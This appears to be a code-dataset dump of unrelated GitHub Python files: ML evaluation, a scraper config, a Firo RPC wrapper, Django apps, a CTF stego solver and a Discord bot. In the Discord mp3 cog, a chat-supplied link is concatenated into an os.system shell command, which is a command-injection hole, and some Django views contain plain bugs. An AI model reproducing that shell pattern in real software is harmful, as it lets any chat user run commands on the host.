train_accuracies, train_top_k_accuracies, train_losses, val_accuracies, val_top_k_accuracies, val_losses = \\\n learnable_eval(cfg, classifier, downstream_training_data_loader, downstream_val_data_loader, device)\n\n classification_results[key] = {\n \"train_accuracies\": train_accuracies,\n \"val_accuracies\": val_accuracies,\n \"train_losses\": train_losses,\n \"val_losses\": val_losses,\n \"train_top_{}_accuracies\".format(top_k): train_top_k_accuracies,\n \"val_top_{}_accuracies\".format(top_k): val_top_k_accuracies,\n \"lowest_val_loss\": min(val_losses),\n \"highest_val_acc\": max(val_accuracies),\n \"highest_val_top_k_acc\": max(val_top_k_accuracies)\n }\n logger.info(\"train acc: {}, val acc: {}\".format(max(train_accuracies), max(val_accuracies)))\n\n fname = cfg[\"parameter\"][\"classification_results_json_fname\"]\n\n with open(fname, \"w\") as f:\n json.dump(classification_results, f)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nzw0301/SimCLR","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":12483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2894322527","text":"# -*- coding=utf8 -*-\n\"\"\"\n 常量定义\n\"\"\"\nfrom zhihu.settings import USER_AGENT\n\nclass Gender(object):\n \"\"\"\n 性别定义\n \"\"\"\n MALE = 1\n FEMALE = 2\n\n\nclass People(object):\n \"\"\"\n 人员类型\n \"\"\"\n Followee = 1\n Follower = 2\n\n\nHEADER = {\n 'Host': 'www.zhihu.com',\n 'Connection': 'keep-alive',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache',\n 'Accept': '*/*',\n 'Origin': 'https://www.zhihu.com',\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': USER_AGENT,\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4',\n}\n","repo_name":"LiuRoy/zhihu_spider","sub_path":"zhihu/zhihu/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1158,"dataset":"github-code","pt":"37"} +{"seq_id":"14345752149","text":"import json\nimport subprocess\nfrom time import sleep\nfrom util.config_loader import config\nfrom util.logger import logger\nfrom util.helper import is_valid_dict_string, print_command_title, is_process_running, dir_exists\n\nFIROD_PROCESS_NAME = 'firod'\nFIRO_CLI_EXE = 'firo-cli'\n\n\nclass FiroCli:\n\n def __init__(self, rpc_calls=None, firo_src_path=None, *args, **kwargs):\n\n if rpc_calls is None:\n raise AttributeError('List of names for rpc calls aren`t provided')\n\n if firo_src_path is None:\n raise AttributeError('Path to the ./firo-cli must be set')\n\n self._options = []\n self._methods = {}\n self._rpc_calls = set([item.strip() for item in rpc_calls.split(',')])\n self._firo_src = firo_src_path\n self._datadir = None\n\n try:\n self._datadir = kwargs['datadir']\n except KeyError as e:\n logger.warning('-datadir isn`t set. Using default.')\n\n if args:\n for value in args:\n self._options.append(f'-{value}')\n\n if kwargs:\n for key, value in kwargs.items():\n self._options.append(f'-{key}={value}')\n\n for call in self._rpc_calls:\n self._methods[call] = self._create_method(call)\n\n self._info()\n\n def __getattr__(self, attr):\n if attr in self._methods:\n return self._methods[attr]\n else:\n raise AttributeError(\n f\"No such command as '{attr}' in 'FiroCli'\\nAvailable RPC calls: {list(self._methods.keys())}\")\n\n def _info(self):\n logger.info('======= FIRO TESTING TOOL =======\\n')\n logger.info(f'Firo src directory path: {self._firo_src}')\n logger.info(f'List of supported rpc calls: {self._rpc_calls}')\n logger.info(f'Command options: {self._options}\\n')\n\n def _generate_command(self, exe, options):\n command = [f'./{exe}'] + options\n return command\n\n def _firo_cli(self, command):\n try:\n result = subprocess.run(command, stdout=subprocess.PIPE, cwd=self._firo_src, check=True)\n # decode the result to string\n decoded = result.stdout.decode('utf-8')\n logger.debug(f'Result:\\n{decoded}')\n # parse if json string\n if is_valid_dict_string(decoded):\n return json.loads(decoded)\n return decoded.strip()\n except subprocess.CalledProcessError as e:\n error_message = f\"Command failed with return code {e.returncode}: {e.output.decode()}\"\n logger.error(error_message)\n raise Exception(error_message)\n\n def _create_method(self, call):\n def method(command_argument=None):\n \"\"\"A dynamically created method\"\"\"\n\n assert is_process_running(\n FIROD_PROCESS_NAME), 'Firo Core should be running. Start Firo Core(firod) process `firo_cli.run_firo_core()`'\n\n logger.debug(f'Adding {call}() method to firo-cli')\n method_options = self._options + [f'{call}'] # add call to command options\n\n if command_argument:\n # append the arg value to command and parse the arg to string\n method_options.append(str(command_argument))\n\n print_command_title(call, [FIRO_CLI_EXE] + method_options, \"@\")\n command = self._generate_command(FIRO_CLI_EXE, method_options)\n return self._firo_cli(command)\n\n return method\n\n def run_firo_core(self, wait=5):\n\n blockchain_check = True\n if self._datadir:\n if not dir_exists(f'{self._datadir}/regtest'):\n logger.warning('Firo Core is starting without existing datadir for blockchain. '\n 'Need some time to generate it!')\n blockchain_check = False\n try:\n firod = is_process_running(FIROD_PROCESS_NAME)\n if firod:\n logger.warning('Firo Core is already running.')\n return firod\n else:\n logger.warning('Firo Core is not running. Starting Firo Core...')\n print_command_title('Starting Firo Core' ,[FIROD_PROCESS_NAME] + self._options, '%')\n # start Firo Core as a separate process\n command = self._generate_command(FIROD_PROCESS_NAME, self._options)\n firod = subprocess.Popen(command, stdout=subprocess.PIPE, cwd=self._firo_src)\n # Wait for the Firo Core process to start running\n counter = 0\n firod_finished = None\n while firod_finished is None and counter is not wait:\n logger.debug(f'Polling Firo Core - attempt: {counter + 1}')\n firod_finished = firod.poll()\n if firod_finished is not None:\n error = 'Firo Core stopped due to error!'\n logger.error(error)\n raise Exception(error)\n sleep(1) # Adjust the sleep duration as needed\n counter += 1\n logger.info('Firo Core is running.')\n if not blockchain_check:\n sleep(wait + 80)\n return firod\n except subprocess.CalledProcessError as e:\n error_message = f\"Command failed with return code {e.returncode}: {e.output.decode()}\"\n logger.error(error_message)\n raise Exception(error_message)\n\n def stop_firo_core(self):\n logger.warning('Stopping Firo Core...')\n firod = is_process_running(FIROD_PROCESS_NAME)\n if firod:\n pid = str(firod.pid)\n logger.warning(f'Terminating Firo Core process...')\n logger.debug(f'Firod process PID: {pid}')\n firod.terminate()\n firod.wait()\n logger.info('Firo Core process terminated successfully!')\n return\n logger.warning('Firo Core is not running. Noting to stop!')\n\n def rebroadcast_transaction(self, txid):\n raw_tx = self.getrawtransaction(txid.strip())\n self.sendrawtransaction(raw_tx.strip())\n\n\nif __name__ == \"__main__\":\n firo_cli = FiroCli(\n config.get('FIRO', 'spark_calls'),\n config.get('FIRO', 'firo_src'),\n 'regtest',\n datadir=config.get('FIRO', 'blockchain_datadir'))\n\n firo_cli.run_firo_core()\n count = int(firo_cli.getblockcount())\n logger.info(count)\n firo_cli.getsparkdefaultaddress()\n firo_cli.getbalance()\n firo_cli.getsparkaddressbalance('sr17k6c6e576vhj3rvtmdq8lg3uze8s9zj98j2e6zuzj7dlcfslxha7ghh2sdpj8chvm3mhe5ap5nwl4cwcmra29wqtyskp7luhqxxe0xek4s6ct8hz8ytug9p3mamw5yed9083n8q886k6x')\n firo_cli.stop_firo_core()\n","repo_name":"ramdjaram/firo-cli-wrapper","sub_path":"rpc/firocli.py","file_name":"firocli.py","file_ext":"py","file_size_in_byte":6725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23560680552","text":"from odoo.exceptions import ValidationError\nfrom odoo.tests.common import SavepointCase\n\n\nclass TestVatUnique(SavepointCase):\n @classmethod\n def setUpClass(cls):\n super(TestVatUnique, cls).setUpClass()\n cls.partner = cls.env['res.partner'].create({\n 'name': 'Test partner',\n 'vat': 'RO30834857',\n 'nrc': 'J35/2622/2012'\n })\n\n def test_duplicated_vat_creation(self):\n \"\"\" Test creation of partner.\"\"\"\n with self.assertRaises(ValidationError):\n self.env['res.partner'].create({\n 'name': 'Second partner',\n 'vat': 'RO30834857',\n 'nrc': 'J35/2622/2012'\n })\n\n def test_contact_vat_creation(self):\n \"\"\" Test creation of partner contacs.\"\"\"\n self.env['res.partner'].create({\n 'name': 'Test partner 1 - child',\n 'parent_id': self.partner.id,\n 'is_company': False,\n 'vat': 'RO30834857',\n 'nrc': 'J35/2622/2012'\n })\n","repo_name":"decodio/oca11","sub_path":"l10n_ro_partner_unique/tests/test_vat_nrc_unique.py","file_name":"test_vat_nrc_unique.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27192688955","text":"from django.contrib.auth.models import AbstractUser\nfrom django.core.validators import MinValueValidator\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.utils import timezone\n\n\nclass User(AbstractUser):\n watchlist = models.ManyToManyField(\n \"auctions.Auction\", related_name=\"watched_auctions\", blank=True\n )\n pass\n\n\nclass Auction(models.Model):\n CATEGORIES = (\n (\"No Category\", \"No Category\"),\n (\"Electronics\", \"Electronics\"),\n (\"Clothing\", \"Clothing\"),\n (\"Home & Garden\", \"Home & Garden\"),\n (\"Toys & Hobbies\", \"Toys & Hobbies\"),\n (\"Automotive\", \"Automotive\"),\n )\n\n name = models.CharField(max_length=255)\n description = models.TextField()\n start_time = models.DateTimeField()\n end_time = models.DateTimeField()\n owner = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"owned_auctions\"\n )\n winner = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n related_name=\"won_auctions\",\n )\n starting_bid = models.DecimalField(\n max_digits=10, decimal_places=2, validators=[MinValueValidator(0)]\n )\n current_bid = models.DecimalField(\n max_digits=10, decimal_places=2, null=True, blank=True\n )\n image_url = models.URLField(max_length=200, null=True, blank=True)\n category = models.CharField(\n max_length=50, choices=CATEGORIES, default=\"No Category\"\n )\n\n watchers = models.ManyToManyField(\n User, through=\"WatchList\", related_name=\"watchlist_auctions\"\n )\n\n def __str__(self):\n return self.name\n\n def update_current_bid(self, bid_amount):\n if bid_amount >= self.starting_bid:\n self.current_bid = bid_amount\n else:\n self.current_bid = self.starting_bid\n self.save()\n\n def close(self):\n if self.current_bid is not None:\n self.winner = Bid.objects.get(auction=self, amount=self.current_bid).bidder\n self.end_time = timezone.now()\n self.save()\n\n\nclass Bid(models.Model):\n auction = models.ForeignKey(Auction, on_delete=models.CASCADE)\n bidder = models.ForeignKey(User, on_delete=models.CASCADE)\n amount = models.DecimalField(max_digits=10, decimal_places=2)\n\n def __str__(self):\n return f\"{self.bidder} bid {self.amount} on {self.auction}\"\n\n def clean(self):\n if self.bidder == self.auction.owner:\n raise ValidationError(\"Owner cannot bid on their own auction.\")\n if (\n self.auction.current_bid is not None\n and self.amount <= self.auction.current_bid\n ):\n raise ValidationError(\"Bid must be higher than the current bid.\")\n elif not self.auction.current_bid and self.amount < self.auction.starting_bid:\n raise ValidationError(\n \"Bid amount must be greater than or equal to the starting bid.\"\n )\n super().clean()\n\n def save(self, *args, **kwargs):\n self.auction.update_current_bid(self.amount)\n super().save(*args, **kwargs)\n\n\nclass Comment(models.Model):\n auction = models.ForeignKey(Auction, on_delete=models.CASCADE)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n text = models.TextField()\n\n def __str__(self):\n return f\"{self.user} commented on {self.auction}\"\n\n\nclass WatchList(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, related_name=\"watchlists\")\n auction = models.ForeignKey(Auction, on_delete=models.CASCADE)\n date_added = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n unique_together = (\"user\", \"auction\")\n\n def __str__(self) -> str:\n return f\"{self.user} is listing {self.auction}\"\n","repo_name":"KameiKento/cs50w-auction-site","sub_path":"auctions/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39361202704","text":"from PIL import Image\r\nimport cmath, math, random, string\r\nimport numpy\r\nfrom scipy.linalg import solve\r\n\r\ntext = 'DDCTF{}'\r\nenc = Image.open('encrypted.bmp')\r\n\r\nmaxLen = 45\r\nimg_size = 800\r\nabs_cor_size = 1.05\r\nmaxValue = 2200.0\r\n\r\n\r\ndef linear_map(v, old_dbound, old_ubound, new_dbound, new_ubound):\r\n return (v - old_dbound) * 1.0 / (old_ubound - old_dbound) * (new_ubound - new_dbound) + new_dbound\r\n\r\n\r\ndef unlinear_map(res, old_dbound, old_ubound, new_dbound, new_ubound):\r\n return (res - new_dbound) * 1.0 / (new_ubound - new_dbound) * (old_ubound - old_dbound) + old_dbound\r\n\r\n\r\ndef unmapping(x, y):\r\n return complex(linear_map(x, 0, img_size, -abs_cor_size, abs_cor_size),\r\n linear_map(y, 0, img_size, abs_cor_size, -abs_cor_size))\r\n\r\n\r\nres = []\r\nz = []\r\ncol = 0\r\nfor row in range(800):\r\n G = enc.getpixel((col, row))[1]\r\n B = enc.getpixel((col, row))[2]\r\n\r\n v_r = unlinear_map(G, -maxValue, maxValue, 0, 255)\r\n if int(round(linear_map(v_r, -maxValue, maxValue, 0, 255))) != G:\r\n # v_r = unlinear_map(G - 1, -maxValue, maxValue, 0, 255)\r\n break\r\n v_i = unlinear_map(B, -maxValue, maxValue, 0, 255)\r\n if int(round(linear_map(v_i, -maxValue, maxValue, 0, 255))) != B:\r\n # v_i = unlinear_map(B - 1, -maxValue, maxValue, 0, 255)\r\n break\r\n if complex(v_r, v_i) not in res:\r\n res.append(complex(v_r, v_i))\r\n z.append(unmapping(col, row))\r\n if len(res) == 44:\r\n break\r\n# print(res)\r\n# print(len(res))\r\n# print(z)\r\n\r\np = []\r\nfor x in z:\r\n tmp = []\r\n t_p = 1 + 0j\r\n for i in range(44):\r\n tmp.append(t_p)\r\n t_p = t_p / x\r\n p.append(tmp)\r\nprint(p)\r\n\r\na = numpy.array(p)\r\nb = numpy.array(z)\r\n# x = solve(a, b)\r\n# print(x)\r\n\r\n\r\n\r\n\r\n","repo_name":"Rai4over/CTFS","sub_path":"DDCTF2018/complex stego/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43230189201","text":"from matplotlib.animation import FuncAnimation\r\nfrom matplotlib import cm\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport cv2\r\nfrom get_fps import FrameRate\r\n\r\n\r\nclass Animation:\r\n def __init__(self):\r\n self.fig, self.ax = plt.subplots()\r\n self.x, self.y = np.meshgrid(np.arange(0, 640, 1), np.arange(0, 480, 1))\r\n\r\n self.cap = cv2.VideoCapture(0)\r\n ret, frame = self.cap.read()\r\n if ret:\r\n self.im = self.ax.imshow(frame[:, :, 0], cmap=cm.hot)\r\n\r\n self.frame_rate = FrameRate()\r\n cv2.namedWindow('src', cv2.WINDOW_NORMAL)\r\n\r\n def __del__(self):\r\n self.cap.release()\r\n cv2.destroyAllWindows()\r\n\r\n def update(self, index):\r\n ret, frame = self.cap.read()\r\n key = cv2.waitKey(1)\r\n\r\n if ret:\r\n self.im.set_data(frame[:, :, 0])\r\n cv2.putText(frame, str(self.frame_rate.get()), (30, 30), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255), 2, cv2.LINE_AA)\r\n cv2.imshow('src', frame)\r\n\r\n if key == ord('q'):\r\n self.__del__()\r\n\r\n\r\nif __name__ == '__main__':\r\n animation = Animation()\r\n ani = FuncAnimation(animation.fig, animation.update, interval=50, blit=False)\r\n plt.show()\r\n\r\n\r\n","repo_name":"yoguri00/beam_monitor","sub_path":"beam_monitor_animation.py","file_name":"beam_monitor_animation.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6784135085","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nObliczanie pola powierzchni trójkąta którego długości boków są znane.\n\nDo obliczenia pola powierzchni trójkąta gdy znane są długości boków używamy\nwzoru Herona, patrz https://pl.wikipedia.org/wiki/Wzór_Herona (10.10.2020).\n\nCC-BY-NC-ND 2020 Sławomir Marczyński\n\"\"\"\n\nfrom math import sqrt\n\n\ndef area(a, b, c):\n \"\"\"\n Obliczanie powierzchni trójkąta za pomocą wzoru Herona.\n\n Dane:\n a, b, c - długości boków trójkąta.\n Wynik:\n pole powierzchni trójkąta.\n Wyjątki:\n jeżeli trójkąt o podanych długościach boków nie istnieje i są\n sprawdzane asercje, to zgłaszany jest wyjątek AssertionError.\n \"\"\"\n\n # UWAGA: assert jest gorszym rozwiązaniem niż sprawdzanie instrukcją if\n # wyjątku ValueError. Assert może nie zadziałać - bo jest możliwość\n # wyłączania - dla przyspieszenia programu - działania instrukcji Assert.\n # Z drugiej strony jeżeli mamy pewność że dane nie potrzebują sprawdzania\n # to wyłączenie assert może przyspieszyć działanie programu.\n #\n # Instrukcja assert expression jest równoważne takiemu fragmentowi kodu::\n #\n # if __debug__:\n # if not expression: raise AssertionError\n\n assert a > 0 and b > 0 and c > 0\n assert a < b + c and b < a + c and c < a + b\n\n p = (a + b + c) / 2\n s = sqrt(p * (p - a) * (p - b) * (p - c))\n return s\n\n\nDŁUGOŚĆ_BOKU_BC = 4\nDŁUGOŚĆ_BOKU_AC = 5\nDŁUGOŚĆ_BOKU_AB = 6\n\nprint('długość boku BC =', DŁUGOŚĆ_BOKU_BC)\nprint('długość boku AC =', DŁUGOŚĆ_BOKU_AC)\nprint('długość boku AB =', DŁUGOŚĆ_BOKU_AB)\n\npole_powierzchni = area(DŁUGOŚĆ_BOKU_BC, DŁUGOŚĆ_BOKU_AC, DŁUGOŚĆ_BOKU_AB)\n\nprint('pole powierzchni trójkąta =', pole_powierzchni)\n","repo_name":"natiem/python-1","sub_path":"01-flow-control/heron_5.py","file_name":"heron_5.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32883413552","text":"import itertools\nimport sys\n\nmoves = list(sys.stdin.read().strip())\n\nshapes = [\n [\n '@@@@'\n ],\n [\n '.@.',\n '@@@',\n '.@.'\n ],\n [\n '..@',\n '..@',\n '@@@'\n ],\n [\n '@',\n '@',\n '@',\n '@'\n ],\n [\n '@@',\n '@@'\n ]\n]\n\ndef merge(loffset, target, source):\n # First do a check\n for i in range(len(source)):\n if target[loffset + i] != '.':\n return False\n # Then do the merge if we can\n for i in range(len(source)):\n target[loffset + i] = source[i]\n return True\n\ndef rindex(l, find):\n for i in range(len(l) - 1, -1, -1):\n if l[i] == find:\n return i\n raise ValueError(l)\n\ndef rfind(l, find, max_idx = None):\n start = len(l) - 1 if max_idx is None else min(len(l) - 1, max_idx)\n for i in range(start, -1, -1):\n if l[i] == find:\n return i\n return -1\n\ndef lfind(l, find, min_idx = None):\n start = 0 if min_idx is None else min_idx\n for i in range(start, len(l)):\n if l[i] == find:\n return i\n return -1\n\ndef check_move(move, row):\n if move == '>':\n idx = rindex(row, '@')\n return idx < 6 and row[idx + 1] == '.'\n elif move == '<':\n idx = row.index('@')\n return idx > 0 and row[idx - 1] == '.'\n else:\n assert False, move\n\ndef do_move(move, row):\n if move == '>':\n max_idx = 1000\n while True:\n idx = rfind(row, '@', max_idx)\n if idx != -1:\n row[idx + 1] = '@'\n else:\n break\n max_idx = idx - 1\n row[max_idx + 1] = '.'\n elif move == '<':\n min_idx = 0\n while True:\n idx = lfind(row, '@', min_idx)\n if idx != -1:\n row[idx - 1] = '@'\n else:\n break\n min_idx = idx + 1\n row[min_idx - 1] = '.'\n else:\n assert False, move\n\ndef check_fall(row_idx, chamber):\n if row_idx == len(chamber) - 1:\n return False\n for i in range(0, 7):\n if chamber[row_idx][i] == '@' and chamber[row_idx + 1][i] == '#':\n return False\n return True\n\ndef do_fall(row_idx, chamber):\n for i in range(0, 7):\n if chamber[row_idx][i] == '@':\n chamber[row_idx + 1][i] = '@'\n chamber[row_idx][i] = '.'\n\ndef solidify(row):\n is_full = True\n for i in range(len(row)):\n if row[i] == '@':\n row[i] = '#'\n if is_full and row[i] != '#':\n is_full = False\n return is_full\n\ndef run_simulation(callback):\n shape_idx = 0\n highest = 0\n chamber = []\n shape_bottom = None\n shape_height = None\n need_shape = True\n stop_count = 0\n\n for move in itertools.cycle(moves):\n\n if need_shape:\n shape = shapes[shape_idx]\n shape_idx = (shape_idx + 1) % len(shapes)\n # 3 units away from highest\n # grow chamber upwards to make space\n while highest < len(shape) + 3:\n chamber.insert(0, list('.' * 7))\n highest += 1\n\n ins = highest - 4\n shape_height = len(shape)\n shape_bottom = ins\n for i in range(len(shape) - 1, -1, -1):\n assert merge(2, chamber[ins], shape[i])\n ins -= 1\n need_shape = False\n\n can_move = True\n for i in range(shape_bottom, shape_bottom - shape_height, -1):\n if not check_move(move, chamber[i]):\n can_move = False\n break\n\n if can_move:\n for i in range(shape_bottom, shape_bottom - shape_height, -1):\n do_move(move, chamber[i])\n\n can_fall = True\n for i in range(shape_bottom, shape_bottom - shape_height, -1):\n if not check_fall(i, chamber):\n can_fall = False\n break\n\n if can_fall:\n for i in range(shape_bottom, shape_bottom - shape_height, -1):\n do_fall(i, chamber)\n shape_bottom += 1\n else:\n for i in range(shape_bottom, shape_bottom - shape_height, -1):\n is_full = solidify(chamber[i])\n stop_count += 1\n need_shape = True\n # highest is the index of the top of the shape, so -1 the height\n shape_top = shape_bottom - (shape_height - 1)\n highest = min(highest, shape_top)\n is_flat = is_full and highest == shape_top\n height = len(chamber) - highest\n if callback(is_flat, stop_count, height, shape_idx):\n break\n\nknown_shape_cycle = None\nseen_shape_flat = set()\ndef discover_shape(is_flat, stop_count, height, shape_idx):\n global known_shape_cycle\n if is_flat:\n if shape_idx in seen_shape_flat:\n known_shape_cycle = shape_idx\n return True\n seen_shape_flat.add(shape_idx)\n return False\n\nrun_simulation(discover_shape)\n\noffset_height = None\noffset_count = None\nprev_height = None\nprev_count = None\nseen_delta = set()\ndef discover_period(is_flat, stop_count, height, shape_idx):\n global offset_height, offset_count, prev_height, prev_count\n if is_flat and shape_idx == known_shape_cycle:\n if offset_height is None:\n offset_height = height\n offset_count = stop_count\n else:\n delta = (height - prev_height, stop_count - prev_count)\n if delta in seen_delta:\n return True\n seen_delta.add(delta)\n prev_height = height\n prev_count = stop_count\n return False\n\nrun_simulation(discover_period)\nperiod_height = sum(d[0] for d in seen_delta)\nperiod_count = sum(d[1] for d in seen_delta)\n\n# Subtract offset, we add it's height back at the end\nnum_stopped = 1000000000000 - offset_count\n# get the number of times we repeat the period\n# tail is the remainder offset\nperiod_times, tail = divmod(num_stopped, period_count)\n\n# Measure the height of \"tail\" counts, starting from the offset\nstop_at_count = tail\ntail_height = None\ndef measure_height_at_count_offset(is_flat, stop_count, height, shape_idx):\n global tail_height\n if stop_count - offset_count == stop_at_count:\n tail_height = height - offset_height\n return True\n return False\n\nrun_simulation(measure_height_at_count_offset)\n# Trail height is initial offset height + final tail height\ntrail_height = tail_height + offset_height\n\n# Finally, multiply the period height by number of times needed\n# and add the trail height\nprint((period_times * period_height) + trail_height)\n","repo_name":"simon816/Advent-of-Code-2022","sub_path":"17/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":6631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11875110798","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.models import User\nfrom .models import *\nfrom .forms import *\nfrom django.contrib.auth.decorators import login_required\n\n@login_required\ndef listarcasoslibres(request):\n casos=Expediente.objects.filter(fecha_ingreso__lte=timezone.now(),estado='1').order_by('fecha_ingreso')\n return render(request, 'buffete/listarcasoslibres.html',{'casos':casos})\n\n@login_required\ndef listarcasosllevados(request):\n casos=Expediente.objects.filter(estado='2').order_by('fecha_ingreso')\n return render(request, 'buffete/listarcasosocupados.html',{'casos':casos})\n\n@login_required\ndef listarclientes(request):\n cliente=Cliente.objects.filter(estado=True).order_by('nombre')\n return render(request, 'buffete/listarclientes.html',{'clientes':cliente})\n\n@login_required\ndef listarcasosterminados(request):\n casos=Expediente.objects.filter(estado='3').order_by('fecha_finalizacion')\n return render(request, 'buffete/listarcasosterminados.html',{'casos':casos})\n\n@login_required\ndef detalle_caso(request,iden):\n caso = get_object_or_404(Expediente, id=iden)\n return render(request, 'buffete/detalle_caso.html',{'caso':caso})\n\n@login_required\ndef nuevocaso(request):\n if request.method == \"POST\":\n exp = ExpedienteForm(request.POST)\n if exp.is_valid():\n expediente = exp.save(commit = False)\n expediente.author = request.user\n expediente.save()\n return redirect('detalle_caso', iden=expediente.id)\n else:\n expediente = ExpedienteForm()\n return render(request, 'buffete/caso_editar.html', {'form':expediente})\n\n@login_required\ndef caso_editar(request, iden):\n post= get_object_or_404(Expediente, id=iden)\n if request.method == \"POST\":\n exp = ExpedienteForm(request.POST, instance=post)\n if exp.is_valid():\n expediente = exp.save(commit = False)\n if exp.cleaned_data['abogado']:\n expediente.estado=\"2\"\n expediente.fecha_inicio=timezone.now()\n else:\n expediente.estado=\"1\"\n expediente.author = request.user\n expediente.save()\n return redirect('detalle_caso', iden=expediente.id)\n else:\n expediente = ExpedienteForm(instance=post)\n return render(request, 'buffete/caso_editar.html', {'form':expediente})\n\n@login_required\ndef terminar_caso(request,iden):\n caso=get_object_or_404(Expediente,id=iden)\n caso.terminar()\n caso.save()\n return redirect('detalle_caso',iden=iden)\n\n@login_required\ndef eliminar_cliente(request,id):\n cliente= get_object_or_404(Cliente, id=id)\n cliente.update(estado=False)\n return render(request, 'buffete/detalle_caso.html',{'caso':caso})\n\ndef nuevousuario(request):\n if request.method == \"POST\":\n us = UserForm(request.POST)\n if us.is_valid():\n usuario = usuario.save(commit=False)\n usuario.author = request.user\n usuario.save()\n return redirect('usuario_nuevo')\n else:\n usuario = UserForm()\n return render(request, 'buffete/usuario_editar.html',{'form':usuario})\n\ndef abogadonuevo(request):\n if request.method == \"POST\":\n abogado = AbogadoForm(request.POST)\n if abogado.is_valid():\n abogado = abogado.save(commit=False)\n abogado.author = request.user\n abogado.save()\n return redirect('casoslibres')\n else:\n abogado = AbogadoForm()\n return render(request, 'buffete/abogado_editar.html', {'form':abogado})\n\n\n@login_required\ndef nuevocliente(request):\n if request.method == \"POST\":\n cliente = ClienteForm(request.POST)\n if cliente.is_valid():\n cliente = cliente.save(commit=False)\n cliente.author = request.user\n cliente.save()\n return redirect('casoslibres')\n else:\n cliente = ClienteForm()\n return render(request, 'buffete/cliente_editar.html', {'form':cliente})\n","repo_name":"Plax96/django-zona","sub_path":"buffete/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16965833571","text":"from pathlib import Path\n\n\ndef main():\n project_dir = Path(__file__).parent\n input_dir = project_dir.joinpath('input')\n src_dir = project_dir.joinpath('AoC2022')\n for i in range(1, 26):\n daily_input = input_dir.joinpath(f'day{i}.txt')\n daily_src = src_dir.joinpath(f'day{i}.py')\n if not daily_input.exists():\n open(daily_input, 'w', encoding='utf-8')\n if not daily_src.exists():\n open(daily_src, 'w', encoding='utf-8').write(f\"\"\"from dataloader import get_input_data\n\n\ndef main():\n data = get_input_data({i})\n\n\nif __name__ == '__main__':\n main()\n\n\"\"\")\n\nif __name__ == '__main__':\n main()","repo_name":"thorn-ale/AoC2022","sub_path":"project_setup.py","file_name":"project_setup.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1366711878","text":"import os\r\nimport discord\r\nfrom discord.ext import commands\r\n\r\nclass mp3(commands.Cog):\r\n\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n @commands.command()\r\n\r\n ###################################################################################\r\n\r\n async def mp3(self, ctx, link):\r\n os.chdir(r\"C:\\Users\\###\\Desktop\\youtube-dl\")\r\n\r\n os.system('youtube-dl --extract-audio --audio-format mp3 ' + link)\r\n\r\n a = os.listdir(r\"C:\\Users\\###\\Desktop\\youtube-dl\")\r\n latest = max(a, key=os.path.getctime)\r\n\r\n if latest[-3:] == 'mp3':\r\n await ctx.channel.send(file=discord.File(r\"C:\\Users\\###\\Desktop\\youtube-dl\\\\\" + latest))\r\n os.remove(r\"C:\\Users\\###\\Desktop\\youtube-dl\\\\\" + latest)\r\n else:\r\n await ctx.channel.send('Pas un mp3')\r\n\r\n ###################################################################################\r\n\r\ndef setup(client):\r\n client.add_cog(mp3(client))\r\n","repo_name":"haddad-github/DiscordBot-Public","sub_path":"cogs/mp3.py","file_name":"mp3.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37203731151","text":"from gui import *\nimport pickle\nfrom os.path import join\nfrom startup import out, error\n\nEnglish_home = 'C:\\\\work_space\\\\home\\\\English'\n#common_words is a set of known words\ncommon_words_file = join(English_home, 'data', 'common_words.pckl')\ndef load_common_words():\n global common_words\n common_words = pickle.load(open(common_words_file, 'rb'))\n list_common_words()\n# user_words is a dictionary {eng: heb}\ndef load_user_words():\n global user_words, user_words_file\n dict_file = tkFileDialog.askopenfile(\n mode='rb', initialdir = join(English_home, 'data'))\n if dict_file:\n user_words_file = dict_file\n user_words = pickle.load(dict_file)\n list_user_words()\n else: \n tkMessageBox.showerror(\"User words\", \"Could not open the user word list\")\n\ndef update_common_words(word_list):\n global common_words\n common_words = set(w.strip().lower() for 